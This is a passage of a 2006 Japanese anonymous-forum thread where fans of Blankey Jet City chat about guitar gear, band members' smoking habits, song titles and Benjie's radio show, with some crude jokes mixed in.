202 :伝説の名無しさん:2006/07/20(木) 00:09:58
>>199
ごめんねごめんねごめんね
電波がとまらないよー…

203 :伝説の名無しさん:2006/07/20(木) 00:30:12
素朴な疑問だが、ブランキー好きな人ってみんな楽器やっとんのかな?ちなみに俺はやっとらんけどね。

204 :伝説の名無しさん:2006/07/20(木) 00:38:31
17歳で飲酒して彼女は山本とヤッタ

205 :伝説の名無しさん:2006/07/20(木) 00:57:48
犯るのも好きな人と聴くのが好きな人がいるよな
俺はドラムやりたいけど今はできる環境ないから上京して大学からやるつもり

206 :伝説の名無しさん:2006/07/20(木) 03:31:51
僕ギターやってます。。でアナログディレイならみなさんマクソンとBossのMD2どちら??

207 :伝説の名無しさん:2006/07/20(木) 06:24:08
おらもギター
変に難しい(やりにくい)フレーズが多いから困る。
あとコピーしてて気付いた事、浅井のギターソロはワンパターン。

208 :伝説の名無しさん:2006/07/20(木) 06:27:25
>>207
JPOPは大体ワンパターンだろ
悲観することじゃあない

209 :伝説の名無しさん:2006/07/20(木) 07:29:01
カスンク

210 :伝説の名無しさん:2006/07/20(木) 14:11:28
ベンジーってアルバムの最初にファンキーバディーヒップかシーサイドジェットシティ入れるの好きだね

211 :伝説の名無しさん:2006/07/20(木) 16:55:43
そんなことないよ

212 :伝説の名無しさん:2006/07/20(木) 20:10:29
マクソンのAD900。

213 :伝説の名無しさん:2006/07/20(木) 21:11:53
Bigまふ か ラットにVOXに直だけ
あとコピーより下手くそでいいから自作のがいいと思う
そっちのほうが楽しいから

214 :伝説の名無しさん:2006/07/20(木) 21:47:31
sageろよ

215 :伝説の名無しさん:2006/07/20(木) 21:57:40
ギーター 聞こえるかな

216 :伝説の名無しさん:2006/07/21(金) 08:14:53
この前電車でベンジーみたいなスパゲッティヘアー見たよ

217 :伝説の名無しさん:2006/07/21(金) 09:48:21
漫画「ワンピース」に出てくる片腕のシャンクスに似てる

218 :伝説の名無しさん:2006/07/21(金) 12:55:07
ユーつべに悪いひとたちあったから見たら
オーバーだけど今の100倍かっこいいと思って島田
あいつら本物だー

219 :伝説の名無しさん:2006/07/21(金) 15:44:42
人間の心の裏側をみようとする暇があったら、マザーの肩でも揉んであげようぜ

220 :伝説の名無しさん:2006/07/21(金) 18:20:25
メンバーが吸っているたばこの銘柄とかわかりませんか?

221 :伝説の名無しさん:2006/07/21(金) 18:29:26
知らないけど、ベンジーにはキャメルとか似合いそう

222 :伝説の名無しさん:2006/07/21(金) 18:30:41
ベンジーは貰い煙草くらいで酔った時くらいしかあんま吸わない
イエローモンキーの吉井ならアメスピの黄色ってのは知ってる

223 :伝説の名無しさん:2006/07/21(金) 18:37:05
ベンジー煙草吸ってるなら止めてくれ。喉を大切にしないと、佐野元春みたいに声が出なくなるぞ。

224 :伝説の名無しさん:2006/07/21(金) 18:47:15
1998のロッキンf
ベンジー マイルドセブンライト一日3箱
照井さん キャメル一日2箱
達也 喫いません。
ってのてたよ。だけどハイスクールで
ベンジー煙草は酔ったときしかすわないって言ってた



225 :伝説の名無しさん:2006/07/21(金) 18:49:45
ベンジーかなりヘビーやったんやね

226 :伝説の名無しさん:2006/07/21(金) 19:09:43
今はおっぱいしか吸いません 浅井健一

227 :伝説の名無しさん:2006/07/21(金) 19:25:25
それも林檎の

228 :伝説の名無しさん:2006/07/21(金) 20:43:07
>>227
氏ね

229 :伝説の名無しさん:2006/07/21(金) 21:52:04
達也のだろ?
今でも好きなんだろ?

230 :伝説の名無しさん:2006/07/21(金) 21:56:01
つまんね

231 :伝説の名無しさん:2006/07/21(金) 23:11:04
昔、雑誌の、煙草は何を吸っていますか?の質問で達也が「乳」って答えてた
みんな考えるんだなあ

232 :伝説の名無しさん:2006/07/21(金) 23:19:02
酔っ払うと凄い鬱陶しい

233 :伝説の名無しさん:2006/07/21(金) 23:49:03
190 名無しにかわりましてVIPがお送りします[] 投稿日:2006/07/18(火) 12:43:36.49 ID:PxdVMW3G0
牛乳のなかにオレンジジュースをいれるとつぶつぶとした白い固まりができる
これはオレンジのクエン酸が牛乳のたんぱく質を引き寄せて電気的なバランスがとれずに固まってしまうから

夕暮れ時って悲しいな!!

234 :伝説の名無しさん:2006/07/22(土) 04:32:27
浅井=バージニアスリム〜中村=ミネ〜照井=カプリ

235 :伝説の名無しさん:2006/07/22(土) 13:25:06
俺=中南海

236 :伝説の名無しさん:2006/07/22(土) 17:24:56
深夜PVで初めて知って調べたら解散騒ぎの真っ最中だった
今ふと思い出して聞いてみたいなと思ったけど曲名もメロディも忘れてしまった
ただただ暗い映像とリズムを刻みなにか赤いソファーがあった気がするがはっきりしない
当時何度も繰り返し見たんだけどな

237 :伝説の名無しさん:2006/07/22(土) 18:01:53
君はデリンジャー

238 :伝説の名無しさん:2006/07/22(土) 19:19:13
休んで少し復活。


239 :伝説の名無しさん:2006/07/22(土) 19:59:45
ランデブービーナスポエムギャング

240 :伝説の名無しさん:2006/07/22(土) 20:16:36
ですてにーー

241 :伝説の名無しさん:2006/07/22(土) 20:22:37
>>236
ぺピンだよ、きっと。
アッウォンチュランミッペッピン ランミッペッピン イェー イェー

242 :伝説の名無しさん:2006/07/22(土) 21:56:51
デリンジャーは銃ってのは知ってるけどサリンジャーは車?
他にも物の題名あるの?

243 :伝説の名無しさん:2006/07/22(土) 22:21:59
カマロ

244 :伝説の名無しさん:2006/07/22(土) 22:40:08
サリンジャーは作家
ベンジーは自分のバイクにそう名付けてるけど

245 :伝説の名無しさん:2006/07/22(土) 22:56:08
なぜ車と思ったんだ?

246 :伝説の名無しさん:2006/07/22(土) 23:15:39
作家だろ

247 :伝説の名無しさん:2006/07/23(日) 01:59:11
ソープ嬢が正解

248 :伝説の名無しさん:2006/07/23(日) 10:41:03
何で邦楽グループ板にブランキースレあるの?

249 :伝説の名無しさん:2006/07/23(日) 11:14:55
しるか

250 :伝説の名無しさん:2006/07/23(日) 12:53:40
そのうち移動することに

251 :伝説の名無しさん:2006/07/23(日) 17:34:36
シド・ヴィシャス

252 :伝説の名無しさん:2006/07/23(日) 18:34:50
ちんぽ

253 :伝説の名無しさん:2006/07/23(日) 19:08:17
ガードル

254 :伝説の名無しさん:2006/07/23(日) 20:08:22
大槻ケンヂ「今日、筋肉少女帯の再結成を報告します」
http://news18.2ch.net/test/read.cgi/mnewsplus/1153576966/

255 :伝説の名無しさん:2006/07/23(日) 21:44:30
>>242はライ麦畑でつかまえて(野崎孝訳)の読みにくい文でも読んでろ

256 :伝説の名無しさん:2006/07/23(日) 22:49:41
ほほ

257 :伝説の名無しさん:2006/07/23(日) 23:05:19
じぇっと

258 :伝説の名無しさん:2006/07/24(月) 12:11:46
そう あれさ そう それさ ここはどこー!!

259 :伝説の名無しさん:2006/07/24(月) 12:23:43
書き方によってこれほど電波を発する詩だったとは・・・

唄はかっこいいけどさ

260 :伝説の名無しさん:2006/07/24(月) 17:43:00
誰か俺のサングラス知らない?

261 :伝説の名無しさん:2006/07/24(月) 18:27:56
ビーチパラソルを

262 :伝説の名無しさん:2006/07/24(月) 20:44:05
閉じてあの娘を深く突き刺したい

263 :伝説の名無しさん:2006/07/24(月) 20:49:18
面白くないね。

264 :伝説の名無しさん:2006/07/24(月) 21:10:38
ハイスクールで
「ベンジーはいつ頃大人になったなあ、という自覚ができましたか?」
っていう質問に

べ「9年前だから、32。」って答えてるんですけど

その頃、ベンジーやブランキー周辺には何があった時期なんでしょうか
おじさん、おば あっじゃなくて
お兄さん、お姉さん、教えてください(><)


265 :伝説の名無しさん:2006/07/24(月) 21:46:34
子供が生まれた時期じゃないかな

266 :伝説の名無しさん:2006/07/24(月) 22:52:06
あっさり

267 :伝説の名無しさん:2006/07/24(月) 23:02:03
9歳(*´Д`)

268 :伝説の名無しさん:2006/07/24(月) 23:27:55
今までLIVE!!!と蟻とラストダンスとハーメルジェットと年代別ベストしか聴いてなくて満足してたけど
やっぱりBANGとCBJは聴いた方がいいかな?


269 :伝説の名無しさん:2006/07/24(月) 23:32:01
ハーメルジェットだけで十分だよ。

270 :伝説の名無しさん:2006/07/25(火) 00:04:10
え?ヲタの間ではそう呼ぶの?
俺知らなかった('A`)

271 :伝説の名無しさん:2006/07/25(火) 00:37:45
半年ROMってなよ

272 :伝説の名無しさん:2006/07/25(火) 07:04:36
半年でいいの?

273 :伝説の名無しさん:2006/07/25(火) 07:22:53
別に人生がつまらないわけじゃないさ

274 :伝説の名無しさん:2006/07/25(火) 07:27:17
>>273朝からそれはキツイ

275 :伝説の名無しさん:2006/07/25(火) 20:51:22
今日のベンジーのラジオ楽しみだな、酒飲み過ぎて寝ないようにしなくちゃ

276 :伝説の名無しさん:2006/07/25(火) 21:23:23
じゃあ俺は酔って寝ないようにベンジーのラジオ聴く

277 :伝説の名無しさん:2006/07/25(火) 21:43:20
俺も酒のみながら待ってる

278 :伝説の名無しさん:2006/07/25(火) 21:44:14
はやくも眠い、、、

279 :伝説の名無しさん:2006/07/25(火) 22:17:50
グーフィー聴くと歌詞どおりの映像が流れる

280 :伝説の名無しさん:2006/07/25(火) 22:34:48
だれかうpってくださいな
おねがいします


281 :伝説の名無しさん:2006/07/25(火) 23:30:21
ベンジー、ペナルティ好きなんだな

282 :伝説の名無しさん:2006/07/25(火) 23:38:25
音人でも言ってたね。
オンバトで見たらしいよ。

283 :伝説の名無しさん:2006/07/25(火) 23:49:29
FMでいちご水が聴けるとは…

284 :伝説の名無しさん:2006/07/25(火) 23:52:58
キタ―――(°∀°)―――

285 :伝説の名無しさん:2006/07/25(火) 23:55:57
初の新曲発表きた

286 :伝説の名無しさん:2006/07/26(水) 00:11:09
>>282
オンバトみてんの?

287 :伝説の名無しさん:2006/07/26(水) 00:42:30
だからいいのさ冒険しようぜ  とのことです。

288 :伝説の名無しさん:2006/07/26(水) 00:48:12
今日中古で赤いタンバリンのシングル見つけたから買った。
で、CD取れねぇ。あれ?なんだよこれ。裏に入ってんのか??

……
あ……

みんななったよな?

289 :伝説の名無しさん:2006/07/26(水) 00:56:00
「競争で面白い人たちだけがTVで流れるNHKの番組」
って書いてあるから、オンバトしか無いかなーって。
たまに観るらしいよ。

290 :伝説の名無しさん:2006/07/26(水) 00:56:23
ベンジーが言ってた「無心になる方法」みたいなやつ…あれは明晰夢見る方法…

291 :伝説の名無しさん:2006/07/26(水) 00:58:59
>>289
オンバトチェックしてるのかー
エンタみて喜んでたらショックだけどオンバトなら、まあ、よし

292 :伝説の名無しさん:2006/07/26(水) 01:51:55
ベンジーってNHKしか観なさそう。
まぁ、民放はしょーもない番組しかやってないから
仕方ないけど・・

293 :伝説の名無しさん:2006/07/26(水) 01:53:50
>>288
わかるよそれ。
俺も8年前に同じ体験したw

294 :伝説の名無しさん:2006/07/26(水) 08:54:57
CDの再販っていつでるの?

295 :伝説の名無しさん:2006/07/26(水) 11:00:09
チリペッパーズのジョンはテレビのない部屋で暮らして
一日中ギターばっか弾くギター仙人みたいな生活してるらしい…
おかげでツインタワー事件も知らずリハで落ち込んでるメンバーに
どうしたんだ?って聞いて初めて事件を知ったとか…
そんな感じでなんかベンジーみたいな普通の感性持ってないタイプの
アーティストはテレビは全然みないイメージがある笑

296 :伝説の名無しさん:2006/07/26(水) 14:10:57
>>295
BUMPの藤原もそうらしいよ
スレチだね

297 :伝説の名無しさん:2006/07/26(水) 14:27:39
いや、ベンジーはいがいと普通なところが面白いのだが

298 :伝説の名無しさん:2006/07/26(水) 15:02:28
ハイスクールでの言葉使いが最近特にふざけてきて、
本当にベンジー?って思える笑
(本当にベンジーじゃないかもしんないけど)

299 :伝説の名無しさん:2006/07/26(水) 18:39:11
じゃあ俺はオナニー仙人だ

300 :伝説の名無しさん:2006/07/26(水) 18:57:45
じゃ俺はマスターベーションマスターだ

301 :伝説の名無しさん:2006/07/26(水) 19:47:56
じゃあ私はウェブデザイナーになるわ!

302 :伝説の名無しさん:2006/07/26(水) 19:59:26
じゃ俺は普通におじさんになるわ

303 :伝説の名無しさん:2006/07/26(水) 20:25:52
じゃあ俺はブランキージェットシティになる!

304 :伝説の名無しさん:2006/07/26(水) 20:37:18
ああ そう

305 :伝説の名無しさん:2006/07/26(水) 21:06:31
じゃぁ今から紅ショウガ食べるわ

306 :伝説の名無しさん:2006/07/26(水) 21:20:22
それもいいね

307 :伝説の名無しさん:2006/07/26(水) 23:00:17
…みんな大好きだ…

308 :伝説の名無しさん:2006/07/27(木) 00:31:28
なんて楽しいんだ

309 :伝説の名無しさん:2006/07/27(木) 00:56:34
このノリいいな笑

310 :伝説の名無しさん:2006/07/27(木) 01:36:51
みんな実りの夏になるといぃな(笑い)

311 :伝説の名無しさん:2006/07/27(木) 01:38:36
みんな実りの夏になるといぃな(笑い)

312 :伝説の名無しさん:2006/07/27(木) 02:09:52
すぱーっく!ムーンサイドしってぃぃ!!!

313 :伝説の名無しさん:2006/07/27(木) 02:33:12
街路樹につまみ枝豆がぁ〜!

314 :伝説の名無しさん:2006/07/27(木) 07:24:55
しってぃぃ!!て言われても。

315 :伝説の名無しさん:2006/07/27(木) 10:42:27
ベンジーの9月に出る新曲、浅井スレでは好評だね。

316 :伝説の名無しさん:2006/07/27(木) 14:02:39
浅井スレなんて
「人と違うこと言いたい」
「ベンジーのこと一番わかってる」
奴らばっかりだから

317 :伝説の名無しさん:2006/07/27(木) 17:51:15
>>312なんかMOTHER2思い出した

318 :伝説の名無しさん:2006/07/27(木) 18:17:32
しってぃぃ!!

319 :伝説の名無しさん:2006/07/27(木) 20:03:44
>>317
あれっておもしろいの?

320 :伝説の名無しさん:2006/07/27(木) 20:14:59
ししししってぃぃ!!

321 :伝説の名無しさん:2006/07/27(木) 21:20:14
>>319
面白いよ
ちょっと今のベンジーの歌詞みたいな感じもあるけど

322 :伝説の名無しさん:2006/07/27(木) 22:15:19
俺と一緒に逃げないか?

323 :伝説の名無しさん:2006/07/27(木) 22:18:59
OK 逃げることは決して悪いことじゃないよ

324 :伝説の名無しさん:2006/07/27(木) 22:27:40
むちゃくちゃイイね その>>312

325 :伝説の名無しさん:2006/07/27(木) 22:43:42
自演乙

326 :伝説の名無しさん:2006/07/27(木) 23:08:36
こんな社会叩き壊してやる

327 :伝説の名無しさん:2006/07/27(木) 23:16:03
おやすみ
明日がいつ来るかわからないくらい深く眠りな

328 :伝説の名無しさん:2006/07/27(木) 23:20:28
うん

329 :伝説の名無しさん:2006/07/27(木) 23:37:32
お腹空いたよおっかさん

330 :伝説の名無しさん:2006/07/27(木) 23:37:38
遺伝的に包茎の方が優性なんだよ
亀頭を保護するからね

331 :伝説の名無しさん:2006/07/28(金) 01:07:39
>>319楽しめると思う。
トリップした世界が出てきたりするし。

332 :伝説の名無しさん:2006/07/28(金) 07:30:21
最近よく目が合う女の子がいます

333 :伝説の名無しさん:2006/07/28(金) 07:42:43
その娘、たぶん近眼だよ。

334 :伝説の名無しさん:2006/07/28(金) 08:21:07
そのマイナス思考は俺は好きだぜペイビー

335 :伝説の名無しさん:2006/07/28(金) 12:12:52
俺の好きな子はバッドガール+左利きのベイベー…

336 :伝説の名無しさん:2006/07/28(金) 17:20:17
もう恋なんてしない

337 :伝説の名無しさん:2006/07/28(金) 17:25:20
こんど話しかけてみよう。

338 :伝説の名無しさん:2006/07/28(金) 17:27:59
彼女の返事はきっとこうさ、世界が終わるまで待っててベイベー

339 :伝説の名無しさん:2006/07/28(金) 17:41:21
生理が終わるまでまっててバイブー

340 :伝説の名無しさん:2006/07/28(金) 17:51:37
ちんこの上に小さな猿が

341 :伝説の名無しさん:2006/07/28(金) 18:01:11
チン先を握りしめ

342 :伝説の名無しさん:2006/07/28(金) 19:45:50
それにも関わらずニュースキャスターは

46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)